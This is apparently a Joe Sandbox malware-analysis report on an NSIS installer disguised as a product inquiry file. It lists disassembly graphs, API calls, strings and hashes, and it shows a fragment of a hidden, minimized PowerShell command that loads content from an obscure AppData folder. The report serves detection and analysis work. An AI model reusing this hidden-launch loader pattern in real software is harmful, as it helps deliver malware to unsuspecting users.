                                                                        • String ID: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 2803837635-31148722
                                                                        • Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                        • Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
                                                                        • Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                        • Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 436 406418-406423 437 406425-406434 436->437 438 406436-40644c 436->438 437->438 439 406452-40645f 438->439 440 406664-40666a 438->440 439->440 443 406465-40646c 439->443 441 406670-40667b 440->441 442 406471-40647e 440->442 444 406686-406687 441->444 445 40667d-406681 call 4063db 441->445 442->441 446 406484-406490 442->446 443->440 445->444 448 406651 446->448 449 406496-4064d4 446->449 452 406653-40665d 448->452 453 40665f-406662 448->453 450 4065f4-4065f8 449->450 451 4064da-4064e5 449->451 456 4065fa-406600 450->456 457 40662b-40662f 450->457 454 4064e7-4064ec 451->454 455 4064fe 451->455 452->440 453->440 454->455 458 4064ee-4064f1 454->458 461 406505-40650c 455->461 459 406610-40661c call 4063db 456->459 460 406602-40660e call 406322 456->460 462 406631-406639 call 406418 457->462 463 40663e-40664f lstrlenW 457->463 458->455 464 4064f3-4064f6 458->464 474 406621-406627 459->474 460->474 466 406511-406513 461->466 467 40650e-406510 461->467 462->463 463->440 464->455 470 4064f8-4064fc 464->470 472 406515-40653c call 4062a9 466->472 473 40654e-406551 466->473 467->466 470->461 486 406542-406549 call 406418 472->486 487 4065dc-4065df 472->487 475 406561-406564 473->475 476 406553-40655f GetSystemDirectoryW 473->476 474->463 478 406629 474->478 480 406566-406574 GetWindowsDirectoryW 475->480 481 4065cf-4065d1 475->481 479 4065d3-4065d7 476->479 483 4065ec-4065f2 call 40668a 478->483 479->483 488 4065d9 479->488 480->481 481->479 485 406576-406580 481->485 483->463 490 406582-406585 485->490 491 40659a-4065b0 SHGetSpecialFolderLocation 485->491 486->479 487->483 493 4065e1-4065e7 lstrcatW 487->493 488->487 490->491 494 406587-40658e 490->494 495 4065b2-4065c9 SHGetPathFromIDListW CoTaskMemFree 491->495 496 4065cb 491->496 493->483 498 406596-406598 494->498 495->479 495->496 496->481 498->479 498->491
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406559
                                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,0040547A,Completed,00000000), ref: 0040656C
                                                                        • SHGetSpecialFolderLocation.SHELL32(0040547A,00418EC0,00000000,Completed,?,0040547A,Completed,00000000), ref: 004065A8
                                                                        • SHGetPathFromIDListW.SHELL32(00418EC0,: Completed), ref: 004065B6
                                                                        • CoTaskMemFree.OLE32(00418EC0), ref: 004065C1
                                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
                                                                        • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,0040547A,Completed,00000000), ref: 0040663F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-905382516
                                                                        • Opcode ID: 45f51d9dc01252261719b03d001f26737c978f2ae06bd424e0053db44885ada5
                                                                        • Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
                                                                        • Opcode Fuzzy Hash: 45f51d9dc01252261719b03d001f26737c978f2ae06bd424e0053db44885ada5
                                                                        • Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 499 40176f-401794 call 402d3e call 405d27 504 401796-40179c call 4063db 499->504 505 40179e-4017b0 call 4063db call 405cb0 lstrcatW 499->505 510 4017b5-4017b6 call 40668a 504->510 505->510 514 4017bb-4017bf 510->514 515 4017c1-4017cb call 406739 514->515 516 4017f2-4017f5 514->516 524 4017dd-4017ef 515->524 525 4017cd-4017db CompareFileTime 515->525 517 4017f7-4017f8 call 405eac 516->517 518 4017fd-401819 call 405ed1 516->518 517->518 526 40181b-40181e 518->526 527 40188d-4018b6 call 405443 call 40324c 518->527 524->516 525->524 528 401820-40185e call 4063db * 2 call 406418 call 4063db call 405a41 526->528 529 40186f-401879 call 405443 526->529 541 4018b8-4018bc 527->541 542 4018be-4018ca SetFileTime 527->542 528->514 561 401864-401865 528->561 539 401882-401888 529->539 544 402bcb 539->544 541->542 543 4018d0-4018db CloseHandle 541->543 542->543 547 4018e1-4018e4 543->547 548 402bc2-402bc5 543->548 546 402bcd-402bd1 544->546 550 4018e6-4018f7 call 406418 lstrcatW 547->550 551 4018f9-4018fc call 406418 547->551 548->544 558 401901-40239a call 405a41 550->558 551->558 558->546 558->548 561->539 563 401867-401868 561->563 563->529
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseks,C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens,?,?,00000031), ref: 004017B0
                                                                        • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseks,"powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseks,00000000,00000000,"powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseks,C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens,?,?,00000031), ref: 004017D5
                                                                          • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                          • Part of subcall function 00405443: lstrlenW.KERNEL32(Completed,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                          • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Completed,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                          • Part of subcall function 00405443: lstrcatW.KERNEL32(Completed,00403385,00403385,Completed,00000000,00418EC0,004031E6), ref: 0040549E
                                                                          • Part of subcall function 00405443: SetWindowTextW.USER32(Completed,Completed), ref: 004054B0
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                          • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseks$C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens$lsaddelmagerarbejderne
                                                                        • API String ID: 1941528284-1201633947
                                                                        • Opcode ID: b10308a6b3538bc82654e2f18f146d1fdb882afacb9ebd3db537b488e5f8fe24
                                                                        • Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
                                                                        • Opcode Fuzzy Hash: b10308a6b3538bc82654e2f18f146d1fdb882afacb9ebd3db537b488e5f8fe24
                                                                        • Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 565 405443-405458 566 40545e-40546f 565->566 567 40550f-405513 565->567 568 405471-405475 call 406418 566->568 569 40547a-405486 lstrlenW 566->569 568->569 571 4054a3-4054a7 569->571 572 405488-405498 lstrlenW 569->572 574 4054b6-4054ba 571->574 575 4054a9-4054b0 SetWindowTextW 571->575 572->567 573 40549a-40549e lstrcatW 572->573 573->571 576 405500-405502 574->576 577 4054bc-4054fe SendMessageW * 3 574->577 575->574 576->567 578 405504-405507 576->578 577->576 578->567
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(Completed,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                        • lstrlenW.KERNEL32(00403385,Completed,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                        • lstrcatW.KERNEL32(Completed,00403385,00403385,Completed,00000000,00418EC0,004031E6), ref: 0040549E
                                                                        • SetWindowTextW.USER32(Completed,Completed), ref: 004054B0
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Completed
                                                                        • API String ID: 2531174081-3087654605
                                                                        • Opcode ID: cc04cc4826fc3d3b155713b60cdeb9a5eed99eab54f27ad30d7602578aff4a07
                                                                        • Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
                                                                        • Opcode Fuzzy Hash: cc04cc4826fc3d3b155713b60cdeb9a5eed99eab54f27ad30d7602578aff4a07
                                                                        • Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 579 40324c-403263 580 403265 579->580 581 40326c-403274 579->581 580->581 582 403276 581->582 583 40327b-403280 581->583 582->583 584 403290-40329d call 403431 583->584 585 403282-40328b call 403447 583->585 589 4032a3-4032a7 584->589 590 4033e8 584->590 585->584 591 4033d1-4033d3 589->591 592 4032ad-4032cd GetTickCount call 40692b 589->592 593 4033ea-4033eb 590->593 594 4033d5-4033d8 591->594 595 40341c-403420 591->595 603 403427 592->603 605 4032d3-4032db 592->605 597 40342a-40342e 593->597 598 4033da 594->598 599 4033dd-4033e6 call 403431 594->599 600 403422 595->600 601 4033ed-4033f3 595->601 598->599 599->590 613 403424 599->613 600->603 606 4033f5 601->606 607 4033f8-403406 call 403431 601->607 603->597 609 4032e0-4032ee call 403431 605->609 610 4032dd 605->610 606->607 607->590 615 403408-403414 call 405f83 607->615 609->590 618 4032f4-4032fd 609->618 610->609 613->603 621 403416-403419 615->621 622 4033cd-4033cf 615->622 620 403303-403320 call 40694b 618->620 625 403326-40333d GetTickCount 620->625 626 4033c9-4033cb 620->626 621->595 622->593 627 403388-40338a 625->627 628 40333f-403347 625->628 626->593 631 40338c-403390 627->631 632 4033bd-4033c1 627->632 629 403349-40334d 628->629 630 40334f-403385 MulDiv wsprintfW call 405443 628->630 629->627 629->630 630->627 635 403392-403397 call 405f83 631->635 636 4033a5-4033ab 631->636 632->605 633 4033c7 632->633 633->603 640 40339c-40339e 635->640 639 4033b1-4033b5 636->639 639->620 641 4033bb 639->641 640->622 642 4033a0-4033a3 640->642 641->603 642->639
                                                                        APIs
                                                                        Strings
                                                                        • ... %d%%, xrefs: 00403368
                                                                        • charterselskabernes denationalised oceaned gonne sahoukar fascistization udeladefortroppernes freezingsphere phora sassias irregenerate reedman paahngene.isblomster undersaatten skver couteau cyclopaedia.agterskibene outperform solides selvhjtideligt kodeord, xrefs: 00403276
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%$charterselskabernes denationalised oceaned gonne sahoukar fascistization udeladefortroppernes freezingsphere phora sassias irregenerate reedman paahngene.isblomster undersaatten skver couteau cyclopaedia.agterskibene outperform solides selvhjtideligt kodeord
                                                                        • API String ID: 551687249-3603914115
                                                                        • Opcode ID: 494a56a41746b47764e522de8cc0aea04fa819f7deb3cd6a2ea5b3ad4f288871
                                                                        • Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
                                                                        • Opcode Fuzzy Hash: 494a56a41746b47764e522de8cc0aea04fa819f7deb3cd6a2ea5b3ad4f288871
                                                                        • Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 643 406760-406780 GetSystemDirectoryW 644 406782 643->644 645 406784-406786 643->645 644->645 646 406797-406799 645->646 647 406788-406791 645->647 649 40679a-4067cd wsprintfW LoadLibraryExW 646->649 647->646 648 406793-406795 647->648 648->649
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                        • wsprintfW.USER32 ref: 004067B2
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-1946221925
                                                                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                        • Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
                                                                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                        • Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 650 405f00-405f0c 651 405f0d-405f41 GetTickCount GetTempFileNameW 650->651 652 405f50-405f52 651->652 653 405f43-405f45 651->653 655 405f4a-405f4d 652->655 653->651 654 405f47 653->654 654->655
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405F1E
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",0040348D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9), ref: 00405F39
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F05
                                                                        • "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe", xrefs: 00405F00
                                                                        • nsa, xrefs: 00405F0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-4256480128
                                                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                        • Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
                                                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                        • Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 739 4015c1-4015d5 call 402d3e call 405d5b 744 401631-401634 739->744 745 4015d7-4015ea call 405cdd 739->745 747 401663-4022ee call 401423 744->747 748 401636-401655 call 401423 call 4063db SetCurrentDirectoryW 744->748 752 401604-401607 call 40598f 745->752 753 4015ec-4015ef 745->753 760 402bc2-402bd1 747->760 761 402925-40292c 747->761 748->760 767 40165b-40165e 748->767 764 40160c-40160e 752->764 753->752 756 4015f1-4015f8 call 4059ac 753->756 756->752 771 4015fa-401602 call 405912 756->771 761->760 768 401610-401615 764->768 769 401627-40162f 764->769 767->760 772 401624 768->772 773 401617-401622 GetFileAttributesW 768->773 769->744 769->745 771->764 772->769 773->769 773->772
                                                                        APIs
                                                                          • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
                                                                          • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
                                                                          • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                          • Part of subcall function 00405912: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens,?,00000000,000000F0), ref: 0040164D
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens, xrefs: 00401640
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens
